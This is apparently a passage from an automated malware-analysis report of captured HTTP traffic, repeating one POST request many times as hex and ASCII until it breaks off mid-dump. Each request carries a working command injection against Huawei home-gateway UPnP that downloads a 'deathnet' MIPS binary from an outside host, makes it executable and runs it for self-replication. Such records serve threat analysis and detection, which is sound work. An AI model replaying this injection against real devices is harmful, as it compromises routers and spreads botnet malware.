61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 